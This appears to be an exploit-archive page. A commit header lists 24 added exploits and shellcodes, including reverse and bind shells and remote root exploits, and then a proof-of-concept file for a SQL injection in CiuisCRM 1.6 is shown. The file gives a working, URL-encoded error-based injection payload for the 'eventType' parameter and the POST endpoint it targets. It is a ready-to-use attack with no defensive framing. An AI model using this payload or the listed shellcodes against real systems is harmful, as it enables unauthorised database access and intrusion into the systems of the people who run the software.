4afcc04eda
24 changes to exploits/shellcodes Linux Mint 18.3-19.1 - 'yelp' Command Injection FaceSentry Access Control System 6.4.8 - Remote SSH Root WorkSuite PRM 2.4 - 'password' SQL Injection CiuisCRM 1.6 - 'eventType' SQL Injection Varient 1.6.1 - SQL Injection PowerPanel Business Edition - Cross-Site Scripting ZoneMinder 1.32.3 - Cross-Site Scripting SAP Crystal Reports - Information Disclosure Sahi pro 8.x - Directory Traversal CyberPanel 1.8.4 - Cross-Site Request Forgery FaceSentry Access Control System 6.4.8 - Remote Command Injection FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery FaceSentry Access Control System 6.4.8 - Remote Root Exploit Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) Shellcode (40 Bytes) Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes) Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes) Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes) Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes) Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes) Linux/ARM64 - Egghunter (PWN!PWN!) + execve(_/bin/sh__ NULL_ NULL) + mprotect() Shellcode (88 Bytes) Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes) Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes) Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes) Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes)
19 lines
No EOL
1.1 KiB
Text
19 lines
No EOL
1.1 KiB
Text
===========================================================================================
|
|
# Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj.
|
|
# Dork: N/A
|
|
# Date: 27-05-2019
|
|
# Exploit Author: Mehmet EMİROĞLU
|
|
# Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489
|
|
# Software Link: https://codecanyon.net/item/ciuis-crm/20473489
|
|
# Version: v1.6
|
|
# Category: Webapps
|
|
# Tested on: Wamp64, Windows
|
|
# CVE: N/A
|
|
# Software Description: Ciuis CRM you can easily manage your customer relationships and save time on your business.
|
|
===========================================================================================
|
|
# POC - SQLi
|
|
# Parameters : eventType
|
|
# Attack Pattern :
|
|
-1+or+1%3d1+and(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
|
|
# POST Method : http://localhost/ciuiscrm-16/calendar/addevent
|
|
=========================================================================================== |